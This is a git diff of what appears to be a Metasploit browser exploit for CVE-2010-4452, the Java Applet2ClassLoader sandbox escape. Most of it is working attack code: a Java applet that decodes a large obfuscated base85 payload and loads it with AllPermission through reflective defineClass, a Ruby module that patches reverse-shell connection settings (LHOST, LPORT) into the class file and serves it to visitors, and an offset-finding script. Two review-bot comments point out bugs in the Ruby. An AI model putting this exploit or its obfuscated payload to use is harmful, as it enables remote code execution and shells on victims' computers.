diff --git a/data/exploits/cve-2010-4452/AppletX.class b/data/exploits/cve-2010-4452/AppletX.class
index 855971ad98..1d68a81854 100644
Binary files a/data/exploits/cve-2010-4452/AppletX.class and b/data/exploits/cve-2010-4452/AppletX.class differ
diff --git a/external/source/exploits/cve-2010-4452/AppletX.java b/external/source/exploits/cve-2010-4452/AppletX.java
index 14c67da29c..76bd8cc245 100644
--- a/external/source/exploits/cve-2010-4452/AppletX.java
+++ b/external/source/exploits/cve-2010-4452/AppletX.java
@@ -1,19 +1,198 @@ public class AppletX extends java.applet.Applet { + @SuppressWarnings("unchecked") public void init() { - Process p = null; - System.out.println( "Executing" ); - try { - p = Runtime.getRuntime().exec( "calc.exe" ); - if( p == null ) - { - System.out.println( "Null process, crap" ); - } - p.waitFor(); +String CONFIG = "CONFIGZZ"; +String DATA = ("`f1J@mS#$,D@%=S:g##d<]4%ovA#$*Wc&;'sg4wlnv#%djF+A<**#$*c" + + "g%Yk%,##dWf+A<*.##mci+A<-1#$*um%?1?v#$+&o&AT0B;0Lh#I/Ek7w:#l7w32Y;NG1V#G4qaB=nXVB=hv/B=L=C##00`#EDwnCUjm" + + "XG/%J2HF7~2#Jac>Gc_cc.`Gi?I'%.~B=K4v=`A#pFL?/7(JFkGI'%.~B=KV,8UG*kH+ve" + + "-%nlwhHFeC(Dnor$$qp]8Dn9YK##.;,E0r&)26D&6H`q#*J&#dBFhU~/HEUo*8wJrYDlml" + + "u8>ePj>]iB@8PfCk#I.g]DjV&=H^~NeGd1_uEiriR&53,>CThuTFgZ>6##fTa),((3=MSL" + + "aHb4@68$QRJGed8&#Iw9X;KO?kB>S)qFKKA9HClk,D7XH*E0r)>26D&6:O@#tHGORACVFn" + + "m#D[0.Ej#[N._g&:/o^kqI'%.~B=KV,=aOf&FL?/7;KY(;B>S)qFKKA9EfVli6,.KQ=]PN" + + ",Bte`3Ej~BO&PN5?C9;EOE-cQ>&v6>h2,$nOE,5MY26D&6D7X/qB=L>.vw#'']U/5-J" + + "V#$=r1&o@Vr-VPXd#,D62$;:K,FL>PtE*Erk#B0Zk;Pt13B>S)" + + "qFKKA8HClh+D7XH*1e~=C#$#$>28%BKQ" + + "?#$>;;#Hn-?CUjpYG/%J2HF7~2HEC_6&vM@ECeSDDE+f5U26D&68:,9m8$R0bJ#vb8Hb=6" + + "kGed8'&wMGcD+l9[F(>8TH*)2'DnBi.B:LX#B=hv/Ej%+0#JY>lB=8IWDgPp>6(JFkNB>A)vFguD8;LS)qFKKA9EfVli;SR:bCTq6h),((TB>S)" + + "qFKKA9IZZ:wHFvh&#J+ikFg;6UF0/3]),((GB>S)qFKKA9DP/YvB>~Z3#I/*XCU4@OH*L)" + + "hCU7Ho/mnZ`B=:KdEdM6A27%24Dn^=q#DZs5;KNXWB>S)qFKKA9HClk,D7XH*#GNZ406@:" + + "w&PN50DmErgEfXeQ#JY>l;KPK6B>S)qFKKA9HClk,D7XH*:QAYEB=:L/H$`uHGemn)28s[" + + "THFn3tDnoktFc^L_FL>PtE0r)>26D&6D7X/qB=LS)" + + "qFKKA9HClk,D7XH*E0sjp26D&6D7X/qB=LS)qHEh@E;P$mF&ki=kB>S)qHEh@E;P$mFF]JK" + + "H=h81eBS)qFKKA9BU^ZkHEUnu#Grr8@<;ZV#,3Q:#%dj^####>#%djB#&+'" + + "~#&4-B##5/%#%djQ#&+'_#&4-B##5/%#$q:M#&O?d#$q:5#&O?f##kS+#&jQj#&sWI####" + + "###,)'#'0cp#'9iM#.jk=##G;.0TuK?0N%o`%8=0a#6?E01JK?.1(#U=(f^SJ#71ND~5-7" + + "=#87ML^0)(_~YTd>#4i7,&koT='hl'<#71N;#>~K;(JM9>##);,02)CM*)$?9###2($;;1" + + "<%nmaB'MK?^Q##$FK#u$dk###,&0m5`a;dKJ:%SXl" + + 
"s),.Jn)I=s%T4%a3#6tcC~oq4q#6P37(jE3()bd~~_-6p20VoOg]i4wB#Q,BA[S9L(###/" + + "'5thbl'hfKK5tiM,.SL^`5tj7A5>2qu5tj=C#>>w=##$IL&54QW,>8)@,YSDG,tnYL-;4q" + + "R-VP@~-qkmi.82>2&##$IL#>>>**_ZQ;##$=H#>>,$##$^S2bX9V`f1J@m" + + "S#$0Yd%MSo`##iWII7swo#$/oN&JtLRdnHTA&K1XXdnBvM#+km*ek?Av#+km+fLuQ$#$:k" + + "9F%crh#$02V&Kh(4gIr#Z&L%3ah+S5~&L7?chb7lj##bM4iCjV9##sA]j@fk=##bM4jwH." + + "C#$0~d&M='BktD=c%kmum#$0hh&Ma?5m7~[,&MsJrmn=m.&N0VudS(ff&N9~vnk:31#&O?" + + "N-VOn<##swop.P``#'KuWiCjVP#$1:u&O-8Ki_1h*&O6>*qb.5u#=8E$r_*Sp&Oc~/s@cH" + + "q&Ouh1swJGl#=wo+t=]5*##YD(#####&KD$Z#>G2&#AjHO###2*######?55;$;Ce3%oE@" + + ":%8@%2#>tS4%nv:<#ESpr&PWL@#Ef't9M>e*#$)1;&L[XPtY%?f#ESpr'hnpH%U9$D#?2:" + + ">;G7F6#$)CA&7>O9)biw0&7PZKdnE~D&7Y`M*_fR:&7klN+AGp@&8)#PdnEnJ&82)QdnEt" + + "L#GhE2,Y~Mf%;PuQ#?2gMAkWPY#?/iMAP&u8=wpbU#CZY`3(s[_#$+c/&>K8b?;31Y#CZY`3(s[c#?4l2$r%):#?>#" + + "5&?5c?APFp`#G1v+B2&ZC#G1v+Bh~lG%^5tC#?,2<%86f<<3&rs#E_`ME0q8A26D&6D7X/" + + "qGed776*kIH<`B''AX$/`#Fn5b=d91p?Bmge?qgW*:Jq0sS)qFKKA9EfVli6,.KQ=]GH+DSU/=Bsi&" + + "tBk[QOH+ve-I'%.4FgWL,HEBSaG.L8WHCo<*F00#tBk@?LH+ve-I'%.4FgWL,HGNC+=ho1" + + "&B/DuE0qow.]mm+D7X/qGed7,#IA$;:K" + + "8FL>Pt/n+fbB=:LAEdM6A27%24Dn^=q08F2]&53,/CThuTFgZ>6#?,]b%nm#?HFn+.B>/K" + + "4=~Jk=B=:KcDgPp>FHnN$=ho1&BS)qFKKA9HClk,D7XH*#GNZ4CU4RUCVEEdBsDoTBWZC&##/[KE0r&" + + "(26D&6D7X/qGed776*kIHB=:KdEdM6A27%24Dn^=q#DZs5C97nJHGi7dDng2)##/vWFL>^" + + "j8wIU.##0-UE0r&626D&6D7X/qGed776*kIHI'%.~B=KV,=aOf&FL?/7;KY(;B>S)q27mR" + + "ZCUe)O%nlwhF1uS6J@04*-qjZVB=:KcEdM6A27%24Dn^=q08F2]I'%.~FgWm7Ej~An##.1" + + "oH*q0kHEUo)/opwsI'%.~B=KV,=aOf&FL?/7@S)qFKKA9HClk,D7XH*E0r)>26D&6D7X/qB=L,##/vWI'%..B=KV,<-r8vB=L=" + + "NCQNV^Hb2b_G`cOX'#&;.E(t%N#QFd9~P*FN##2I.I'%.$HGM8HDiucq#?YQW#IXZiC3fwd##0-UHEh=#EkHJ*1r*hI'#7q" + + "iMbUN]#LWWbN_Kr@##0_S##-aTI'%.(FgWm7Ej~AnHGNCl=ho1&B-v?&ki:0Ptd9C'&3LrQq`]IE*NBI26D&6D7X/qGed77#IA<~#RLMIBmC%" + + "hH+ve-DST]'#N#PoRnX.U#N>brSkTX`#?-snTM5jd#?[Hw#QOkuu^'(5l2X%fBo#P%n-+%u_:B>S)qDnpLPHClk1D7XH*CU~5bCW:)0&PN5" + + 
"LElDIe-Epq##AbuIHCk^O>0C~P*EX#?[p/'(uA/E(vB;F'~iNH*)2" + + "'DnBi.B:LX#B=hv/'2/G@CT_NHC9_<`D67o^^e>0O##2^5I'%.'FgWm7HEBSlG.L8WHCo<" + + "*F00#t#QFd9+%u^]B>S)qBsD`9HF7e>CRd',H*qM5FLu83+~Vp]B>S)qBsD`9HF7e>EfDa" + + "$Gd1)bH+w(6&wVwvZV@N*E,#AW26D&6H`q#*J&#dBFhU~/HEUo*8wJrYDlmlu*_ZUUB>S)" + + "qBsD`9HF7e>FcS3)Fe<6ZCThd)E***E26D&628EeE#FJDmDmBXP225~^##-b-I'%..CVMO" + + "7Dn^A-BmY-N28F7IHG3s]BshQj&vZPjZq[l1#QFd9[S72;#?[v1')hq?~kTM8#QXs<(eau" + + "BB>S)qElDJ01pCE1D67p)#?WUn#Qt2@HG9Ve#JbAlB=8=SEdM6A27%24H*(nR[S.+S##27" + + "(I'%.'FgWj6HEBSkG.L8WHCo<*F00#t#5nO6)GC2S)q1qRIXG//6wHCo<*F00#t#5wU" + + "7),();B=:LAEdD0@1p_)3Dn^=q&r1,@^eM@DE*NBI26D&6D7X/qE3;un%DZJg#?~TB#RLP" + + "JB=8IWEdM6A27%24FhVOlEiriu),((GB>S)q27mRZFL?.hGed8'&wMGc`(dRA#R^ZFY=oB" + + "D#$@m/#P.s#H$]Ws`Cp]W##2m:Dlt`w`(UT~#$AQB#PJ0%CO-+e#$>Hb'+P$^M+tfjE*E<" + + "H26D&6Ej^#8B>@H&#$>ZS'+b0ba~BWV#7poJb=rEH##0_S#?WT_#SR7^1jT4,',1IUYYE5" + + "D#SmGQd7k&_#?]2S',^hmeP4=n#J0wKf1c](#?]DY'-I?.geH='#U9@^hFwF^#?]Y`'.*c" + + "2KMBowF]/9EB=]_?#?YQX%LE-`#?]_b'.Eu@j~=T9#4_b+'MJQ/DST]'G-Q+EHED4w#$>o" + + "f#P.rtDlj+F#>>0H%nlwhB>S)qF1Z+A)b^:IB>S)qFKKA9EfVli;SR:bCTq6h),((TB>S)" + + "qFKKA9IZZ:wHFvh&#J+ikFg;6UF0/3]&53,>;nut~B>8N&##/[F;KXC*B>S)qFKKA9HClk" + + ",D7XH*)b^9tB=:KcEdM6A27%24Dn^=q08F2]%86f,<5<(]#I/-XCVC$WBru3o*)$CJ098J" + + "PI'%.~B=KV,=aOf&FL?/7##.1qG._6k#I&*~;KOHnB>S)qFKKA9HClk,D7XH*E0r)>26D&" + + "6D7X/qGed778@*3OCU.Qu##.2'=hAcbFL?/7),((I=MSLaHb4@68$QRJGed8&#Iw9X;KO?" 
+ + "kB>S)qFKKA9HClk,D7XH*E0r)>26D&6:O@#tHGORACVFnm#D[0.FgqQX##/X?E0r%o26D&" + + "6:O@#tHGORACVFnm08FDV),((8B>S)q27mRZHb=6kGed8'#Iw9XEj#XM#I/?lCU4CPFhU~" + + "tHG3t54wkw+B=:KcEdM6A27%24Dn^=q;MSo+B>S)qFKKA9HClk,D7XH*E0r)>26D&6D7X/" + + "qGed776*kIHE*WHJ26D&6D7X/qHFc~)Gd1nrG#SHGCVOo%#Jb5P;KNXWB>S)qFKKA9HClk" + + ",D7XH*#F-a'B>OmWS)qFKKA9HClk,D7XH*&PN4jS)qFKKA9HClk,D7XH*B=:KvEdM6A27%24Dn^=q08F2]I'%.~B=KV,-W1]9Y>5W#I/*_CTmwHCVXN$/l)IO##/9RHEh*sFh_CTCVY)4DST~~/oL_" + + "oI'%.~FgWm7Ej~AnE0r`%26D&6D7X/qGed776*kIH##/-NHEh*qCVF5WDj#4`##/[K;KXC" + + "&B>S)q27mRZCUe)O$qp~eDm4#t##00_E0r%h26D&69RC]q6*Y7D##/-NBS)q27mRZG//6wHCo<*F00#tB=:K" + + "vEdM6A27%24Dn^=q08F2](JFk6B>S)qFKKA9H_)n,F1$,2&53,>=MSLaDnp8:##/[L;KXC" + + "+B>S)qFKKA9H_)n,F1$,2##.1oCW'dj/kc;ZE0sj]26D&6D7X/qGed776*kIHB=:KdEdM6" + + "A27%24BtJDc6,.KUE*WHJ26D&6D7X/qFhU~/H+vq(D-?pDFHps_=ho1&B)c(/+bSB>S)qFKKA9IwJC1F0Ti3Db^::)b^:" + + "RI'%.~FgWm7G.L8%HCo<*F00#t#ttAb#JbK(E0qAD26D&6S)qFKKA9HClk,D7XH*>]iW'/l2OP#GNZBBrqSCHFvh&/meT_B=:KdFF.HC=aP8*CU[f" + + "q##.2)HEh*sG//6wHCo<*F00#t/n=rdB=:KdDgPp>H^c~1HGORGCVFnm#D[0.;KO9iB>S)" + + "qFKKA9HClk,D7XH*B=:KvEdM6A27%24Dn^=q08F2]&PN50FMVn/EP#2q#JY/k06@:w%nlw" + + "vHGjC9CU~5b#ttB@#I%aN;KNp_B>S)qBsD`9HF7e>CRd',H*qM5FLu83#GNZ4;KOZtB>S)" + + "qHEh@E;P$mFE0sjp26D&6H`q#*J&#dBGd1b8CQC-oCpeB/HEC~p>]i-C/r]j8I'%.~CVMO" + + "7Dn^A-8UGa.=g;MZBte`3E0r`%26D&6H`q#*J&#dBGd1)%H+w(68~/iXCUe3&FgZ>)>]i-" + + "LGZ+TH:Tw9B##03~BdkC##/-NCp@M^8[30NH+ve-/sQE@I'%.~B=KV" + + ",=aOf&FL?/78>ePcE0s4l26D&6H`q#*J&#dBFhU~/HEUo*8wJrYDlmlu;KY(BB>S)qFKKA" + + "9EfVli6,.KQGZXrMEk?D-EfXeY#JY>l;KNUVB>S)qFKKA9EfVli6,.KQ##/-NIBd[$HG=?" 
+ + "mCThWf/mnZ`B=:KdEdM6A27%24CUR]O#D[E7CU4=NHEg2i#I&-`;KP0-B>S)qFKKA9HClk" + + ",D7XH*E0sjp26D&6D7X/qB=L.7wRCTh0j/n=rdI'%.~FgWm7Dn]&)HCo<#F00#t#GNZ4I^')" + + "~H,+L=G#/0C#IJQu;KO6hB>S)qFKKA9BU^ZkHEUnuE0r)>26D&6D7X/qE3;un6,6vFGuXi" + + "KGcbqwGe8(0DHQsDFd[<_FeES)qDnpLPCSEK%Ge8(2Gu+KF#I/TmFh@f['2/GLB=qg#FhhG0B=(%M#>>0B+~Vp" + + "-;KY?YB>S)qFKKA9HClk,D7XH*CpJ2R#D[?7Ej5pSFKo~t#J`XN:NR=TB=:KdEdM6A27%2" + + "4CUR]O#D[E7;KOHnB>S)qFKKA9BU^ZkHEUnuE0r)>26D&6D7X/qGed778@*3OCU.Qu##.2" + + "'C:~+fCn#[a/l2OP#F-a5HbTkjGeeC5#IA8##.[AI'%-" + + "uHGM8H;L<5tEiiin%86f;;NjkJ#F&/^E0q8A26D&6Ej^#8BtI&q6*Y7wa6M,[ML-5~gB5]M]VT_4r," + + "V_5/;Y]ql-@$tTlO]P[`].:*Qh]NbIK#6PTB_,ECD+/L,a]l=Zn%Yc<6?YofY]m0j(%u)E" + + "7#6G3Q/ki^)#6ufb#6S+@]QFiw]Qk&l#6GH?)GISU#6tU#%qSms5^*5@#$_aO&r$].&nMD" + + "k?[)S_V+qJ]&S2MW)c$l`1JG5i+>j,w1eb>h?ZlGb#6P6Q0ipDi2-pZ3+++)#1eb>h%=J6" + + "i?[_wl^4-c$?_9/Y=b.2l%:o^L=`+6O]QaXe]Uo[;'S~ML#6GBV*)*f'#6GBV*)*f(^4cQ" + + ")_c&X#$)JeK?_7XG]N#hU?_8]L=]?8G%:oaM#vTHm(1@c9W&V`&E)cww(`)dgg+(#$G+'97h=A6/6#?ZY]_DhMr]qnY2%V8UC(j?:" + + "-#6Fq0]iQ(m#5qS+########%1##,)(#$q]VkiC#6wO<#6wDA#6wDBB3n`P$*F:@]rqGQ%:s'R5d:>%#88[" + + "u]MTQ1%t~Cs%gWJ[$Y9[0#6G6R#BhT5)c$f^]MobY5c&-tDbRTI#6G'M)c~f3hFjDL_.Nc" + + "L]ql-@E*`uW1L'ql]NbIK#6YZC+&Y.(ED3fK$tTa0_bt;e$)MKBc+3oaF^>S^?WR7@XgwN" + + "B#5wg1$Dg~Bc+F&cG?te`?WR7@Xh4ZD#5wg1$`-eEc+X2eGvUwb?WR7@XhFfF#5wg1#6Ii" + + "J$rn1j?blaZ=]$&B=a1(U$=sCIHq^uN(egj4$Y9L+?c2s[In[>+~&JF[###&$$V^~,##'5" + + "E##)O1#>>8(&59W<_b@^H]1`6/?q^Q(#YY;'<(m9q#6%;#,>=NU?W[=D~6/hE#6K9V]ZCe" + + "$#6GH?#6ZMmc$)k6#6u8Q#6S+@JkWI_(gI(Q(/20i0O=bk;T~wQ%SXlr-qq('#6ZOa##)8" + + "T&53(-_b@dJ]1`6/0h_RN#>>2&,tn;B?W[=D0NeDg~6K%G#3CD>Xj.Pg2-pGi]NbIK#5f*" + + ";######7CNB##,+:###%.##G;Y####'#6ZN,<)$*CMG1I5_.kKn#5g'O######7UZD##,+<###%.##G=6####)MbLbgN(g^e#6ZNR13ZIO#6HYd#6w>" + + "i$@#^NO%cj<<1Et$OA**<1QMP-5b7uf+4h-3Ow`;jX~o/jP?vNW#6G$L+wwEePYAN>&ko$" + + ",?YofY.SR=)#6HF`#4kp~$=t_u?.8ld_?g2C]ql-@$AJvn)c8Lv#6HD_.SQT#W_`k;$=sW" + + 
"L]~EMr+/=s%$XkPl]~WZ#MPHA=u1.n&-VV0/]MKKP#6PTB##)7M&53(-awT]V]1`6/%nv%" + + "-%SQw/t=~hv6JMSM+aXcR(0^eN#6GjQ;b]nv]S6uN,Dq^h~C(BP#3CD>Al'N%$$HH5#6G$" + + "H]QR$<$~jsN?W[=D10FVi+^>$Z]~NSw+.3aF3`$Pu&58a>Al&VK)c6V:_,*$r]ql-@%#,3" + + "p%=w_$$Y9Q]/ki#W%:KE]#4*:h)c7Jd3j8`q'MP-A$Y9N`]RU6*MPH;;u1.n(]M]Y%Xd9Z" + + "(]QR.UW_f$c$?eX;+liY80S0<$#6G'O0Mj[v$;_I[T1l])$=O'v'hkE1$=O$i#6J:>$;@A" + + "d13QBF]]0#(Xd>J[#6#'8$?f/(;<@lj3)$wm=a1%T=`sqS###%)##kS+#8.%Z#6=g0#'']" + + "I##5/(0O=`_[S6c8#u%t.#6HE^$V~$9##,+9##G;'##5/*#5~C(######87)H##,+.###%" + + ".##5/f#####^?6,i#6(,rUeJ5k(v_23U.i)n(vq>5V+e2m~_$oo#6&sQ]^HL1#60Wc^@2c" + + "i#612s##);Q#####").replace('~', '\\'); +byte[] payload = new byte[9132]; +for (int i = 0; i < DATA.length()/5; i++) { + long val=0; + for (int j = 0; j < 5; j++) val = val * 85 + (DATA.charAt(i*5+j)-'#'); + for (int j = 0; j < 4; j++, val >>= 8) payload[i*4+j] = (byte)val; +} +Class I = int.class, BA = byte[].class; +Class PD = java.security.ProtectionDomain.class; +final java.security.Permissions permissions = new java.security.Permissions(); +permissions.add(new java.security.AllPermission()); +final java.security.ProtectionDomain pd = new java.security.ProtectionDomain(new + java.security.CodeSource(new java.net.URL("file:///"), + new java.security.cert.Certificate[0]), permissions); +java.lang.reflect.Method m = ClassLoader.class.getDeclaredMethod("defineClass", + new Class[] {String.class, BA, I, I, PD}); +m.setAccessible(true); +Class c = (Class) m.invoke(new java.net.URLClassLoader(new java.net.URL[0]), + new Object[] {null, payload, new Integer(0), new Integer(1888), pd}); +byte[] payload2 = new byte[7244]; +System.arraycopy(payload, 1888, payload2, 0, 7244); +c.getConstructor(new Class[] {PD, BA, BA}) + .newInstance(new Object[] {pd, CONFIG.getBytes(), payload2}); } catch( Exception e ) { diff --git a/external/source/exploits/cve-2010-4452/get_offsets.rb b/external/source/exploits/cve-2010-4452/get_offsets.rb index 7278f34bf1..8b134e965b 100755 
--- a/external/source/exploits/cve-2010-4452/get_offsets.rb +++ b/external/source/exploits/cve-2010-4452/get_offsets.rb @@ -1,7 +1,11 @@ #!/usr/bin/env ruby +dat = nil dat = File.open(ARGV[0], 'rb') { |fd| fd.read } - -puts "cmd_off = 0x%x" % dat.index("\x00\x08calc.exe") -puts "cn_off = 0x%x" % dat.index("\x00\x07AppletX") +if dat + puts "config_off = 0x%x" % dat.index("\x00\x08CONFIGZZ") + puts "cn_off = 0x%x" % dat.index("\x00\x07AppletX") +else + "No data?!" +end diff --git a/modules/exploits/windows/browser/java_codebase_trust.rb b/modules/exploits/windows/browser/java_codebase_trust.rb index 8858de1a62..da029586db 100644 --- a/modules/exploits/windows/browser/java_codebase_trust.rb +++ b/modules/exploits/windows/browser/java_codebase_trust.rb @@ -21,12 +21,16 @@ class Metasploit3 < Msf::Exploit::Remote super( update_info( info, 'Name' => 'Sun Java Applet2ClassLoader Remote Code Execution Exploit', 'Description' => %q{ - This module exploits a vulnerability in Java Runtime Environment - that allows an attacker to escape the Java Sandbox. By supplying a - codebase that points at a trusted directory and a code that is a URL that - does not contain an dots an applet can run without the sandbox. + This module exploits a vulnerability in the Java Runtime Environment + that allows an attacker to run an applet outside of the Java Sandbox. When + an applet is invoked with: - The vulnerability affects version 6 prior to update 24. + 1. A "codebase" parameter that points at a trusted directory + 2. A "code" parameter that is a URL that does not contain any dots + + the applet will run outside of the sandbox. + + This vulnerability affects JRE prior to version 6 update 24. }, 'License' => MSF_LICENSE, 'Author' => [ 
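Review bot: The new `else` branch in get_offsets.rb is a bare string literal, `"No data?!"`, which Ruby evaluates and discards, so a missing input produces no output at all; it should be `$stderr.puts "No data?!"` (or `abort "No data?!"`). The guard around it is also ineffective: `File.open(ARGV[0], 'rb') { |fd| fd.read }` returns a String (possibly empty) rather than nil, so `if dat` is always taken, and the added `dat = nil` on the line before is overwritten immediately. The failure that can actually happen, `dat.index(...)` returning nil when a marker is absent, still reaches `"0x%x" % nil` and raises a TypeError; checking each index result for nil before formatting, or at least `if dat && !dat.empty?`, would make the script fail with a readable message.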
@@ -42,13 +46,30 @@ class Metasploit3 < Msf::Exploit::Remote [ 'URL', 'http://fhoguin.com/2011/03/oracle-java-unsigned-applet-applet2classloader-remote-code-execution-vulnerability-zdi-11-084-explained/' ], [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpufeb2011-304611.html' ] ], - 'Platform' => [ 'java', 'win' ], - 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, + 'Platform' => [ 'java' ], #, 'win' ], + 'Payload' => + { + 'Space' => 20480, + 'BadChars' => '', + 'DisableNops' => true, + 'Compat' => + { + # bind doesn't make much sense for client sides + 'ConnectionType' => '-find -bind' + } + }, 'Targets' => [ # OK on Windows x86 + IE + Sun Java 1.6.0u21,u22,u23 # FAIL on Ubuntu x86 + Firefox + Sun Java 1.6.0u23 - [ 'Automatic (no payload)', { } ] + [ 'Generic (Java Payload)', + { + 'Arch' => ARCH_JAVA, + 'Platform' => 'java', + } + ], + + # Native payloads aren't currently supported (only work with jar/war) =begin [ 'Windows x86', { @@ -56,12 +77,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', } ], - [ 'Generic (Java Payload)', - { - 'Arch' => ARCH_JAVA, - 'Platform' => 'java', - } - ], =end ], 'DefaultTarget' => 0, @@ -70,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ - OptString.new('CMD', [ false, "Command to run.", "calc.exe"]), + # This is the default for a 32-bit Windows install OptString.new('LIBPATH', [ false, "The codebase path to use (privileged)", "C:\\Program Files\\java\\jre6\\lib\\ext"]), ], self.class) 
@@ -98,27 +113,37 @@ class Metasploit3 < Msf::Exploit::Remote # Do what get_uri does so that we can replace it in the string host = Rex::Socket.source_address(cli.peerhost) host_num = Rex::Socket.addr_aton(host).unpack('N').first - - codebase = "file:" + datastore['LIBPATH'] code_url = jpath.sub(host, host_num.to_s) - cmd = datastore['CMD'] - cmd_off = 0xb4 + codebase = "file:" + "C:\\Program Files (x86)\\java\\jre6\\lib\\ext" + codebase = "file:" + "C:\\Program Files\\java\\jre6\\lib\\ext" - cn_off = 0xfc + config = "Spawn=2\nLPORT=#{datastore['LPORT']}\n" + # The java payloads decide to be reverse if LHOST is set. + config << "LHOST=#{datastore['LHOST']}\n" if datastore['PAYLOAD'] =~ /reverse/ + config_off = 0x10e + + cn_off = 0x2f76 case request.uri when /\.class$/ + # NOTE: the payload for this module is implemented in the .class file directly. + # + # This is due to the following: + # 1. The file must be a single .class file + # 2. The class inside must derive from Applet + # + # As such, we do not use the traditional payload generation facilities. #p = regenerate_payload(cli) print_status("Sending class file to #{cli.peerhost}:#{cli.peerport}...") cls = @java_class.dup - cls[cmd_off,2] = [cmd.length].pack('n') - cls[cmd_off+2,8] = cmd + cls[config_off,2] = [config.length].pack('n') + cls[config_off+2,8] = config - cn_off += (cmd.length - 8) # the original length was 8 (calc.exe) + cn_off += (config.length - 8) # the original length was 8 (CONFIGZZ) cls[cn_off,2] = [code_url.length].pack('n') cls[cn_off+2,7] = code_url @@ -137,7 +162,6 @@ class Metasploit3 < Msf::Exploit::Remote EOS print_status("Sending HTML file to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, html) - handler(cli) end end
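Review bot: `codebase` is assigned twice on consecutive lines, so the first assignment (the `Program Files (x86)` path) is dead code, and neither line reads `datastore['LIBPATH']` — the LIBPATH option still registered in the `@@ -70,7 +85,7 @@` hunk, whose description says it sets the codebase path, is now silently ignored. Keep a single assignment, `codebase = "file:" + datastore['LIBPATH']`, and drop the hard-coded duplicates (or leave the x86 path as a comment if it is meant as a reminder). The new magic offsets `config_off = 0x10e` and `cn_off = 0x2f76` come from the companion script `external/source/exploits/cve-2010-4452/get_offsets.rb` changed in this same commit, but nothing here says so; a comment such as `# offsets from get_offsets.rb; regenerate whenever AppletX.class is rebuilt` would tie them together. The enclosing method begins before this hunk.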